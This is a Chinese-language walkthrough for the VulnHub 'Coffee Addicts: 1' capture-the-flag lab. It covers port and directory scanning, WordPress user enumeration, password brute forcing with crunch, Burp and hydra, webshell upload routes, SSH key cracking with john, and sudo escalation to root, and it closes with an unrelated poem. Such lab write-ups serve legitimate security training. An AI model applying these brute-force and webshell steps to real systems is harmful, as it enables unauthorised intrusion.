vulnhub之Coffee Addicts: 1靶场writeup
Our coffee shop has been hacked!! can you fix the damage and find who did it?
This works better with VirtualBox rather than VMware
2.1.1 端口信息
nmap -sS -sV -p 1-65535 -T4 -O 10.0.0.131
只开放了22、80端口,先从web应用入手
2.1.2 脆弱服务
访问80端口应用版本信息:
“ADD coffeeaddicts.thm to your /etc/hosts”,修改本地hosts
再次访问,发现页面被黑
使用dirb爬取目录
目录扫描:
dirb http://coffeeaddicts.thm/
发现存在wordpress网站,使用wpscan扫描cms漏洞
wpscan --url http://coffeeaddicts.thm/wordpress
wpscan --url http://coffeeaddicts.thm/wordpress -e u
发现用户gus;在查看wordpress页面,发现与密码相关信息
使用Crunch生成密码字典,生成gus 、i、need、you、back这个几个词组的组合
crunch 15 15 -p gus i need you back
使用burp-suite爆破口令
登陆测试爆破是否成功
登陆成功,尝试webshell后台拿取webshell。wp常见后台getshell方法如下:
1、直接修改替换默认404页面
2、上传包含木马文件的zip主题部署
3、上产包含木马文件的zip插件部署
在gus家目录发现flag1。
2.2 权限提权
收集系统信息
uname -a
cat /etc/redhat-release
cat /etc/crontab
crontab -l
/var/spool/cron/
……
这有一个思路暴力猜解可登陆的3个用户
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.131
爆破出1个账户口令
第二个思路在badbyte家目录发现私钥
下载私钥转换为john可破解hash
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py
python ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
使用openssl由私钥产生公钥
openssl rsa -in id_rsa -out pub_id_rsa
登陆
再次收集信息查看可利用点权限提升,发现sudo可提升权限
执行sudo提权
拿到root权限
获得flag2!!!
PS:
君子平等待众人,上而不媚下不嗔。
盛气凌人人切恨,傲慢无礼伤人尊。
临财见色不失足,逢冤遇怨敛芒针。
言而有信行必果,德贯天地照古今。
赞 (0)